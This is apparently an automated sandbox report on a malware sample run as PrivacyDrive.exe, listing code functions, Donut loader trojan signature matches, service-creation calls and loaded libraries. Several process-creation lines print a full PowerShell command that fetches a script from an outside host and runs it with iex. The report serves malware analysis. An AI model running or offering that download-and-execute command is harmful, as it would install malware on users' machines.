Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FAFCA2	8_2_00FAFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FB9DB2	8_2_00FB9DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72D5B	8_2_00F72D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F76EFD	8_2_00F76EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7BEE2	8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F76EB2	8_2_00F76EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F78EB2	8_2_00F78EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72E8E	8_2_00F72E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72E1A	8_2_00F72E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F72FB3	8_2_00F72FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7CF72	8_2_00F7CF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011EF193	8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D2006	8_2_011D2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01208040	8_2_01208040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DC080	8_2_011DC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DB0E0	8_2_011DB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D1359	8_2_011D1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_012183B0	8_2_012183B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_0120E2A0	8_2_0120E2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D12B3	8_2_011D12B3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DB570	8_2_011DB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D15B1	8_2_011D15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D1418	8_2_011D1418
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D148C	8_2_011D148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D54B0	8_2_011D54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D74B0	8_2_011D74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D54FB	8_2_011D54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DA4E0	8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011E17C0	8_2_011E17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_012066E0	8_2_012066E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01206970	8_2_01206970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D3890	8_2_011D3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_0121A8B0	8_2_0121A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01207D90	8_2_01207D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011FBC50	8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011F9F99	8_2_011F9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011DCE00	8_2_011DCE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_011D7EB0	8_2_011D7EB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00424910 appears 45 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00418CF0 appears 92 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 004FFB7D appears 31 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F80862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 011DEE60 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00439540 appears 36 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 051ACBE0 appears 83 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F7E5E2 appears 89 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F8E5E2 appears 89 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0041F120 appears 65 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 011DCBE0 appears 93 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00406E50 appears 178 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 051AEE60 appears 122 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 004C24A0 appears 135 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0045EC80 appears 107 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0052CF10 appears 37 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00407150 appears 69 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 0045EEC0 appears 42 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00F90862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 004FFB4F appears 47 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 00418AC0 appears 74 times

One or more processes crash

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760

Yara signature match

Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.win@13/30@4/3

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004030E0 PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,PeekMessageW,GetLastError,FormatMessageW,LocalFree,

4_2_004030E0

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004D3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,

4_2_004D3270

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0043E991 GetVolumeInformationW,GetDiskFreeSpaceExW,

4_2_0043E991

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,		4_2_0041D320
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: CreateServiceW,ChangeServiceConfig2W,SetLastError,		4_2_0041CE80

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_00F80C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,

4_2_00F80C6F

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_051DF006 CoCreateInstance,

4_2_051DF006

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_004D3220 FindResourceW,SizeofResource,LoadResource,LockResource,

4_2_004D3220

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0041D320 OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,CloseServiceHandle,OpenSCManagerW,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,CreateServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle,GetLastError,

4_2_0041D320

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2504
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess764

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anvhf53m.wns.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winhttp.dll	Jump to behavior
